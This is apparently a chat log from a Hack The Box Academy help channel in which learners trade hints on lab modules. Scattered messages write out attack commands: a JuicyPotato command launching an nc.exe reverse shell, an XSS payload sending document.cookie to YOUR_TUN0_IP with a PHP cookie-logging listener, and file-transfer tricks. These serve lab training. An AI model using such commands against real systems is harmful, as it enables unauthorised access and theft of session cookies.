graceful rampart
#

In an AD domain, logins aren't validated by the computer. They're validated by the domain controller

#

In large domains there can be more than one DC, so the DC that validated the login is stored as well

stuck hull
#

got it. thank you so much

graceful rampart
#

Np

rustic sage
#

Hello, good day.

I was wondering, there's the CPTS and CBBH paths with modules (I haven't gone through either of them Indepth),

1, Why exactly would I choose CBBH over CPTS, I'm seriously curious, are the modules similar in both paths or there's more that makes one a CBBH and more that makes one a CPTS, also,

2, Since CPTS can engage in CBBH activities and vice versa, what's the diamond in the dirt?

I'd like to know so I can choose perfectly based on my goals and personality.

I understand that a bounty hunter's main goal is to find bugs and squash them but a pentester doesn't actually set out to look for them or am I not getting the concept properly?

I'll like some enlightenment, thank you.

fathom pendant
#

Bug bounty hunter is all about service application exploiting, penetration tester is about taking the exploits and gaining access deeper into the system

#

Which is why there's overlap

#

Kinda hard not to dip into bug bounties when doing penetration testing

graceful rampart
#

Bug bounty is fundamentally different than pentesting in the fact that you'll be looking very very deeply into webapps mostly. Yes there is some overlap but the two roles are completely different. Pentesting aims to fully compromise a network where bug bounty aims to compromise an application

fathom pendant
#

^

rustic sage
#

Thanks @fathom pendant and @graceful rampart .

naive aspen
rustic sage
#

hey am doing Buffer overflow on linux x86, Identification of Bad Characters, I have a question on how to generate the next set of CHARS, after i find bad characters. Can someone help me out?

devout torrent
#

Can I ask a does the foot printing hard machine start blocking scans after a while? Like I can nmap without Pn at start but can’t after I wanna try some different script

fathom pendant
#

That one iirc can be done without even thinking about nmap

devout torrent
#

The hard one is removing my will to live, I’ll be honest 😄

iron plaza
#

❗ just want to bring this to the attention of the htb mods... the timer for the target has a glitch ... It is running faster than normal (i.e. 1 min is less than 60 sec). How did I find out? well I am keeping the timer on my phone as well and it showed 2 min elapsed but HTB shows 10 min instead.

tired creek
#

hey

graceful rampart
iron plaza
graceful rampart
#

Ignore it

#

If the time says 90 min when you reset the box, it'll be up for 90 minutes regardless of how fast the time runs out

devout torrent
radiant saddle
#

Skills Assessment - WordPress

The server is so slow, that the reverse shell fails everytime. Does anyone know how to fix or bypass this?

I am using the reverse shell from msfconsole unix/webapp/wp_admin_shell_upload

fathom pendant
magic valve
#

Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:

AD Enumeration & Attacks - Skills Assessment Part II im on the question:

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I have an open xp_commandshell and logged into the database.

graceful rampart
magic valve
graceful rampart
graceful rampart
brisk geode
graceful rampart
#

As frustrating as they may be, they are all doable

#

frustration is very common when working on these things

#

get used to it

#

you wont be able to just skip parts of the exam

brisk geode
#

nah i skipped password attacks to do later

graceful rampart
#

The password attacks labs are really fun

#

the PtH and PtT sections are important for when you do AD

#

would not advise skipping that module

brisk geode
graceful rampart
#

like 3 days for password attacks and a day and a half for common services.

#

But dont compare yourself to me

#

Everyone learns at a different pace

#

for example, I did both AD skills assesments in 8 hours. Most of the people who ive asked all said it took them roughly 8 hours just to finish the second one

magic valve
graceful rampart
#

lmk what youve tried so far

magic valve
surreal jewel
#

Hi, started cbbh and going through web requests module, and was wondering the following:
Is there anything that cannot be done without burp suite? using browser dev tools, curl and python scripting, would that in general be enough to replace any need for zap/burp suite, or are there advanced things they do that makes it hard to not use them?

midnight patio
#

Good evening. Could someone help me with the "Password Attacks Lab - Hard" module?

graceful rampart
#

your more likely to get a response

midnight patio
#

oh well I didn't want to rush through the door

graceful rampart
#

All good, but its always better to just ask your question

midnight patio
#

well. I was able to crack the *.vhd file and mount it on my Linux system. I got the SAM and System database. I extracted the infos with samdump2 and received the Admin hash. Unfortunately after cracking the hashes with either hashcat or john it shows an empty pw. Also crackstation shows an empty pw. I wasn't able to use neither of them for authentification.

hazy grotto
buoyant escarp
#

some hints please on assessment 2 of NOSQLI
my SSJI payloads wont succeed, not sure what to try next

proper pagoda
# woeful ermine no it works check mutations again

I've checked the permutations for both password, and password1. I've applied the custom.rule rule, but with absolutely no favourable outcome. I'm now lost AF. Have u used any other permutation rules, or went with the provided one?

waxen barn
#

Anyone on here completed the Windows Privilege Escalation Skills Assessment I? I can't get Juicy Potato to work no matter what listening port I use. The command I'm using it start .\JuicyPotato.exe -l 47001 -p c:\windows\system32\cmd.exe -a "/c c:\Users\Public\nc.exe 10.10.16.24 8443 -e cmd.exe" -t *

last cape
#

anyone know why i get a separator unmatched error when using hashcat to crack hccapx files? thank you

rustic sage
#

hi crean! finally managed to login to smtp after reading the smtp tutorial auth base64 encoding.: EHLO inlanefreight.htb
250-WIN-EASY
250-SIZE 20480000
250-AUTH LOGIN PLAIN
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
Username in base64
334 UGFzc3dvcmQ6
Password in base64
235 authenticated.

#

but then I have to intercept the email that I've sent?

warm sand
#

hi folks! module* attacking web applications with ffuf - skills assessment*; the question is: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I've tried the recursive scan for each subdomain that I've found previously but no luck in finding anything relevant. Anyone available for a nudge or/and some help? Thank you

high sentinel
#

👀

buoyant escarp
high sentinel
#

so lonely in the vc 👀

placid quest
#

@rustic sage did u try with evolution

rustic sage
high sentinel
#

is that for smtp stuff?

rustic sage
rustic sage
high sentinel
#

if you prefer console you might wanna just try mutt then 🙂

#

no GUI like setup needed, no account setup needed, pretty much just like another terminal command 😄

rustic sage
#

thanks for the advices , awesome !!!!

rustic sage
high sentinel
#

wheres your avatar from btw? 😄

warm sand
high sentinel
#

looks more like an anime 😄

#

seems that it's a bit old already (no offence) 😄 why this one specifically and not some "mainstream" thing like pokemon? 😄

thorn urchin
#

calling sailor moon a cartoon kills my soul. Also extremely off topic.

bruh sailor moon IS mainstream

magic valve
#

Hey everyone, I was wondering if I can get a nudge/DM someone regarding the following:

AD Enumeration & Attacks - Skills Assessment Part II im on the question:

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I have an open xp_commandshell and logged into the database. Attempted to transfer nc64.exe to gain a reverse shell and an exploit for privilege escalation but won’t transfer.

high sentinel
#

won’t transfer.
what does that mean exactly?

thorn urchin
#

what are using to transfer

magic valve
#

Certutil.exe and attempted Invoke Web Request. Getting the “200” from the python web server hosting on the attacker machine and “-URLCache command completed successfully but not shown in the system32 directory.

high sentinel
#

curl http://your.box/nc64.exe -Outfile ./nc64.exe?

thorn urchin
#

or at least test that you have write access first

magic valve
magic valve
thorn urchin
#

can also just try smb hosting the file

#

or skip dropping a file altogether for now and use meterpreter smb delivery and use run32dll to remotely load a meterpreter shell.

#

then use that to do whatever you need to do

teal oak
#

Hi, an starting htb from start. One question to ask.
If iam starting a box and how will i prepare for attacking that box?

#

in the basis of knowledge

thorn urchin
#

do that, and then do all the starting point machines from the main site

teal oak
#

and can you explain, what exactly is that?

thorn urchin
#

the skill path is a collection of modules on htb academy

teal oak
thorn urchin
#

I answered

magic valve
# thorn urchin can also just try smb hosting the file

Tried and received the following message: “You can’t access this shared folder because your organization’s security policies block unauthenticated guest access.”
I would like to transfer files into the database without the help of metasploit as I am studying/practicing for OSCP and would like to do thing the manual way. I will probably need to use metasploit though..as no file transfer methods seem to be working..

thorn urchin
foggy thistle
#

How do you connect to a windows machine from the academy parrot vm - been stuck on active directory for 3 days - lol

thorn urchin
#

wdym by connect

foggy thistle
#

when I look at the help pictures they show using windows - but when I read it seems they use linux

#

I am confuse lol

thorn urchin
#

Im confused by what youre confused by

sour osprey
#

why wont the ip adress i got provided load anything in firefox? it just says "cant connect"

foggy thistle
#

Do I use windows or do I use linux

#

for the active directory stuff

thorn urchin
#

which active directory stuff, which module?

foggy thistle
#

Introduction to Windows Command Line

thorn urchin
#

It probably has an instance to spin up at the bottom and itll tell you how to connect to it

foggy thistle
#

kk ill keep at it some of just one ip and no log ins

#

but I have not been able to get a windows environment to pop

thorn urchin
#

cause ya seem to be missing how the structure of the modules work

magic valve
# thorn urchin you have to host the share with authentication

That makes sense..attempted to append -username and -password with all credentials found in the answers front the AD Enumeration & Attacks - Skills Assessment Part II (including the provide attacker machine credentials) but receiving a message stating “the username or password is incorrect”.

thorn urchin
#

the authentication is what you set up when youre hosting the smb share

#

like if youre using impacket-smbserver it defaults to guest creds but you can supply arguments for authentication instead

#

doesnt need to be a real account

magic valve
#

Like this? Not real user or password..

thorn urchin
#

looks about right

#

idr syntax off the top of my head though

graceful rampart
#

yea that looks about right

magic valve
graceful rampart
#

you have to connect to the share using net use. net use n: \\<ip>\<sharename

#

Then you can simply copy files from the n drive. copy n:\filename .

autumn pilot
#

Can you reach that network, e.g. subnet?

#

if you cannot, how can you copy something

magic valve
magic valve
quasi wave
#

why is there a macOS fundamentals module if there are no HTB Academy modules or HTB boxes that are about hacking macOS?

vestal estuary
#

hi, quick question: in "getting started" module section "Privilege Escalation" the second Question root priv excalation, the hint mentions "chmod" but I managed to get the root flag by means of ssh. Did I missed something in that lesson? I did ran linpeas but couldn't exploit dirtypipe successfully.

rustic sage
#

Relevant question.

I personally think it's because macOS is more or less "Linux" (forgive me for using it loosely) with it's access to shell, and one may get to use it sometime during one's journey in career, so I guess it wouldn't hurt to be familiar.

This is just my opinion. There could be plans to introduce a macOS hacking module.

#

@quasi wave

buoyant escarp
buoyant escarp
warm sand
buoyant escarp
#

can give me someone a hint for NOSQLI assessment 2 - SSJI a hint what im doing wrong?
the encoded payload im using is ```" || true || ""=="````

high sentinel
#

what's SSJI?

buoyant escarp
#

server side javascript injection

high sentinel
#

nosqli and javascript? huh, sounds like a weird combination

#

afaik nosqli is not directly tied to javascript

buoyant escarp
#

its exclusive to nosql with the $where clause

high sentinel
#

ok, well sounds a bit specific. I'm not saying it's impossible

#

but if you're really going for injecting javacript, you probably don't want to tamper with the actual results of the nosqli query and rather do code exec, hmm?

buoyant escarp
#

to get a bypass or fetch data from db by enumerating

high sentinel
#

well if you have an idea how the query looks like, it should be somehow easy to know what to inject in there ..

#

i haven't worked with nosqli db for many years so i'm pretty rusty with nosqli, id probaly go with something like { $ne : null } or so

buoyant escarp
#

i tried to use all the payloads from the learning chapters, but in the assessment i cant get it working, maybe a filter on server side

high sentinel
#

haven't done it, so can't tell

buoyant escarp
#

i try it for 4 days now, i just want to finish it xD

high sentinel
#

can't really help on this specifically, if you're having trouble debugging your payloads, just get back to some basic ones and work your way up

buoyant escarp
#

frustrating

high sentinel
#

that's the best way in my experience

magic valve
#

So the share got authenticated successfully but having getting “access denied” when trying to copy the file from share. Am I inputting something incorrectly?

high sentinel
#

possibly if you paste some data, but i haven't done anything from academy myself

graceful rampart
high sentinel
#

payloads or so

magic valve
high sentinel
#

and what are you injecting to?

buoyant escarp
#

└─$ cat script.js
new Image().src='http://YOUR_TUN0_IP/index.php?c='+document.cookie

#

the website input is vuln to xss

high sentinel
buoyant escarp
#

change the ip from 0.0.0.0 to your tun0

#

the other user that loads the script.js needs to know where to call
in that case its your machine

#

so a valid ip is needed

#

remove the first payload from script.js
just use the new Image() one

magic valve
high sentinel
#

at least it shows you that it grabbed the file this time

buoyant escarp
#

sudo php -S 0.0.0.0:80
0.0.0.0 means all requesting IPs are passed through

#

not just a specific, like a whitelist

#

and use port 80, not https
also make sure you are in the same folder as the files, when running your php sevrer

magic valve
high sentinel
#

It's fine to ask for help, my point is that you might need to "debug" the commands that you get here a little. I haven't done any of the academy stuff i have no clue what exact command is needed

magic valve
#

Oh I understand. No worries

high sentinel
#

The point of experimenting should be that you work your way up by things like confirming that the file is downloaded from your box, written to the target box and so on
hopefully you get that

buoyant escarp
#

but do you see a connection from the victim? on you php server

#

in the console

#

did you insert the xss into the "website" input field?

high sentinel
# magic valve Understood. Thank you

anyway, don't feel like you im discouraging you from pasting more stuff in here, i'd be glad to help more or to see further error you need to dead with

buoyant escarp
#

└─$ cat index.php

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
autumn tundra
#

is anyone willing to help with my DNS enumeration issue

high sentinel
#

sure

#

paste away 😄

autumn tundra
#

iam working on this question:
What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

this is the command i am running:
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

buoyant escarp
#

i cant remember the exact xss payload i used, i need to check

autumn tundra
#

i understand that subdomains have subdomains. my issue is i have tried all the wordlists in the directory on the subdomains from the intial scan. however, i am making no progress

high sentinel
#

i'm not familiar with dnsenum

autumn tundra
#

@high sentinel
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
mail1.inlanefreight.htb. 604800 IN A 10.129.18.201
app.inlanefreight.htb. 604800 IN A 10.129.18.15

high sentinel
#

i'd do something like dig @inlanefreight.htb -x x.x.x.203

autumn tundra
#

@fathom pendant is this not the right direction?
dnsenum --dnsserver 10.129.42.195 --enum -p -s0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

fathom pendant
#

So that's a start, but not the end

buoyant escarp
#

im trying right now, i have no notes on that 😄

fathom pendant
buoyant escarp
#

for me its working

#

thats the payload to put into the website input field

#

there is no encoding

#

i did paste is like that

#

yes "> is %22%3e

#

so you have your machine ip in script.js, and also in the xss payload

#

and you dont have other tun open?

#

@rustic sage and u did it in here?

#

website input field is the vulnerable field
like is said 3 times now haha

#

haha

#

nah

#

did you do php -S 0.0.0.0:80?

#

okey it connected

#

like the listener on the other side wont "click" it

#

wow im out of ideas

fathom pendant
#

Borked

round quarry
#

anyone there

fathom pendant
#

GladOS?

buoyant escarp
#

yes try it

#

thats the one i tested right now

#

ima go to bed now

#

good luck next time

magic valve
high sentinel
#

nice 🙂

#

hopefully you feel accomplished now 🙂

magic valve
#

Yes! I was losing my sh** on this one! 😂

fathom pendant
magic valve
fathom pendant
#

No problem! It's just one of those exciting things

magic valve
#

That’s exactly what it was..stuck on that one for 3 days!! And I do mean full days and late nights sadly..was my days off work. Lol

tawdry ravine
#

not sure if this is the right place, sorry if not, i cant write messages in other places.. i'm trying to solve the machines but all the ports keep coming back as filtered when i scan. i tried resetting, reconnecting, and different machines but they all come back as filtered. any help would be appreciated

novel matrix
waxen barn
#

Windows PrivEsc Skills Assessment I. What the hell is going on here? JuicyPotatoNG and I'm still not able to connect because of the COM server port.

high sentinel
#

isn't it more just about using anonymous session or so?

#

haven't done it so i don't know for sure. Can possibly help if you're interested

ripe terrace
#

Yeah, it's a thing lol. It's described in the section, using crackmapexec.

#

And they provide a password list to use; there is also another password list you gain from cracking FTP in the previous exercise. But neither of those lists seem to work for the SMB section.

high sentinel
#

how come? are you using the lists correctly?

ripe terrace
#

As far as I am aware, yes...

high sentinel
#

what tools did you try to use?

ripe terrace
#

Tried both medusa and crackmapexec

high sentinel
#

and both failed?

ripe terrace
#

Both run through the lists until the end and don't return any credentials.

high sentinel
#

so you've tried using some verbose mode or so, right? (getting something like unsucessful login attempt for user xyz)

ripe terrace
#

Yeah, all of the results come back in the same fashion, e.g., \jason:badger STATUS_LOGON_FAILURE

high sentinel
#

hmm, are you sure your username is correct?

ripe terrace
#

I mean, it's the one I'm instructed to use

high sentinel
#

and the syntax of the commands? \jason does not seem like a correct form of the argument, but it might be just the output of local auth of a tool

ripe terrace
#

Yeah, that's just the crackmapexec output, I'm calling it like:

crackmapexec smb A.B.C.D -u jason -p password.list

high sentinel
#

i'd do crackmapexec smb -u jason -p password.list A.B.C.D

#

cme is sometimes a bit weird about argument positioning

#

but if you tried medusa as well, it's probably not the issue

#

hmm, this is quite strange really

#

well, maybe .. did you try ||passing the username as password||?

ripe terrace
#

The full output seems to suggest it's doing it correctly:

SMB A.B.C.D 445 ATTCSVC-LINUX [-] \jason:kevin STATUS_LOGON_FAILURE

ripe terrace
high sentinel
#

hmm, possibly a machine name may be needed? looks like it's a linux box running smb which is not that common

#

like ATTCSVC-LINUX\jason?

ripe terrace
#

Do you mean a Linux box running SMB?

steady python
#

I see that several people have asked but didn’t notice an answer anywhere. Is the footprinting-easy lab, is it possible to find the password without looking at the hint?

high sentinel
#

ATTCSVC-LINUX -> suggests that the target box is running linux

high sentinel
#

the hints don't need to be taken 😄

ripe terrace
#

Yeah, I get that, you just said "looks like it's a windows box running smb" lol.

high sentinel
#

heh, sorry by bad, doing too much stuff at the moment 😄

#

i meant linux ofc

ripe terrace
#

Haha, all good.

#

I'll try it, including the domain/hostname and see what happens

high sentinel
#

any idea is that's a dc? you could try adding --local-auth

steady python
high sentinel
#

iirc -d domain, which could possibly (?) help as well

ripe terrace
#

Nothing would suggest it is, given the preceding module contents and what's been taught. So unless HTB is pulling a tricky on me, I doubt it...

high sentinel
#

can't really tell

ripe terrace
#

Side note: It's odd placing the IP at the end of the command causes cme to terminate immediately with no output, whereas placing it after the smb protocol flag, works shrugs

graceful rampart
#

Well thats just syntax. The help menu specifically says the options come after the IP

high sentinel
#

linux syntax ftw, cme is just weird

high sentinel
#

try using known password now just with --local-auth

#

that could possibly work as well

#

(without the machine name)

ripe terrace
#

I'll give it a shot

#

Yes, that works; the output is the same as when I was using -d, but it automatically used the machine name. Which is great to know for the future!

#

Thanks for the nudge(s) PartyParrot

high sentinel
#

np 👀

#

you could +rep on htb me if you feel like it 😄

ripe terrace
#

DM me your profile link

high sentinel
#

i'm using the same name as here 🙂

#

so, what's the next target? 😄 bruteforcing http? 😄

ripe terrace
#

Bruteforcing notepad.exe 😄

high sentinel
#

how is that done? teach me 🙂

ripe terrace
#

Not sure, haven't learnt it myself yet!

high sentinel
#

dam 😄

fathom pendant
#

Lolbins are wild

hazy grotto
#

What’s the fastest way to brute FTP? Hydra? Anything other? Thread count?

ripe terrace
#

I've always had good success with Hydra

#

Thread count will vary based on the server/network

hazy grotto
#

What’s the highest you can go? I’m just starting to mess with it

ripe terrace
#

FTP is a little bit slow, so I usually start with the default (16) and watch it for a little bit

raven cairn
#

Be careful with thread count. You can dos

ripe terrace
#

Then adjust up/down based on timeouts, etc.

high sentinel
#

does anyone need help at the moment? 😄

raven cairn
#

Not right now unfortunately

thorn urchin
#

person, modules chat is not for flirting

amber garden
#

hi .. when i'm running GetUserSPNs i'm getting KRB_AP_ERR_SKEW.. i've tried to setup ntp as ntpdate 172.16.8.20 but i got : ntpdig: no eligible servers ...any clues ?

thorn urchin
#

DMs and gen chat are for flirting

raven cairn
#

Gen chat for flirting lmao

amber garden
#

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

high sentinel
#

yeah, that's it

#

ntpdate ip should be working just fine

#

possibly some verbose/debug flag?

#

you can set the time manually as well, ntpdate is just much easier, it depends how badly you need the ntpdate. You could possibly debug it using nmap udp scan on the ntp port

amber garden
#

tried manually as well - moved my vm to the same time zone as DC but still the same : |

high sentinel
#

that doesn't make sense

#

is there rpc open on the box?

hazy grotto
ripe terrace
#

Slightly confused; the Attacking SQL Databases section continually makes references and has examples using sqsh - but neither pwnbox nor ParrotOS HTB edition has it installed.

fathom pendant
#

That sounds like something to bring up in #858470491676737536 especially if pwnbox doesn't have it

hazy grotto
#

can i dm you?

hazy grotto
#

Medium lab. FTP what am I doing

amber garden
#

i think this is my vpn ..anybody else is having a issue where every 4 min vpn drops and reconnects like "2023-01-13 13:40:24 [htb] Inactivity timeout (--ping-restart), restarting"

amber garden
#

root 1041391 0.0 0.1 10100 4820 pts/0 S+ 12:55 0:00 | | _ sudo openvpn academy.ovpn
root 1041392 0.0 0.0 10100 488 pts/1 Ss 12:55 0:00 | | _ sudo openvpn academy.ovpn
root 1041393 0.0 0.2 13500 9240 pts/1 S+ 12:55 0:00 | | _ openvpn academy.ovpn

high sentinel
#

i think there's your problem 😄

amber garden
#

if i stop - there is nothing left :

high sentinel
#

you should be running just one process if i'm correct. If that persists, possibly try switching protocols - TCP/UDP

amber garden
#

hmm

#

stopping vpn kills all

#

rerun the command again and also have 3..

#

well to be honest nothing changed on my end for a long time

#

just started getting those drop out y-day

high sentinel
#

possibly try running wireshark on your host then?

#

and debug if the connection drops at some point

rotund swallow
#

Im sorry my emotion gets in the due to anger

#

I want to learn how to hack

#

I have VM and VPN ready

#

I didn't install kali or parrot VM yet

#

This will help

#

port scanning I heard is not good manually doing is good...

#

payload under developer to accept a patch and transmit in the final stage

#

but unsure of all the steps

steady python
#

I’m looking for some help with the foot printing medium lab. I’ve done some enumeration and I’m trying to access the Techsupport share but I’m not getting anywhere. Using a script in nmap I was able to determine there’s about 10 ticketxxxx.txt files but I can’t get to them. Is this a dead end or am I just missing something?

high sentinel
#

I’m trying to access the Techsupport share but I’m not getting anywhere
how exactly?

rustic sage
#

[']

fathom pendant
steady python
fathom pendant
#

It's a mood

#

I couldn't remember how exactly I did that lol

novel matrix
rotund swallow
#

do I need to go to the darkweb and create anyonmous email or something

#

I am unsure to hide the identity and create acct at hackthebox

#

deep web*

#

it all trails back not sure how to fully hide my identity

#

phone number IP starting points etc etc

#

phone number register under ur name unless prepaid card is used and still need to be registered with ur S.S

#

there is a trail

fathom pendant
#

I mean

#

There are ways to spoof things

rotund swallow
#

ok...?

#

backdoor?

fathom pendant
#

They're pointing to the door

rotund swallow
#

backdoor is hwen u hack something and u wanto re-enter?

#

huh?

#

dunno what that means

sly tapir
#

what module is this about?

fathom pendant
#

It's not I'm just playing with them

rotund swallow
#

wait so use a hacked real account thru the dark web?

#

that's the door meaning? spoof??

fathom pendant
rotund swallow
#

I dont have money for that

fathom pendant
#

You don't need to be anon on htb

#

You can make a burner email, only access it via a VM over a VPN connection

#

Which is a lot of work but technically possible

#

Lager, i see what you're communicating and it's funny

rotund swallow
#

the funny thing is my friends want me to burn onthe cross Id ont have money for a lawyer

#

the people who knows me in person wants to *politically beat men

#

I have no way to fend myself and I am sitting duck here

fathom pendant
#

That sucks dude and I really don't know what you're looking for here

rotund swallow
#

yeah ill end the conversation here

#

ah one more last thing

#

trust no one

fathom pendant
#

Not even yourself

amber garden
#

did you ever figure this out ? in the same place now ...

sly tapir
#

did you fill in this part {$_SERVER['TARGET']}

#

also..you need to add the port your attack machine is listening on i.e., x.x.x.x:1337

rich vale
#

just now getting back to AD module skills assessment 2 after a week away... can anyone offer some tips/advice for escalation from a mssqlclient connection?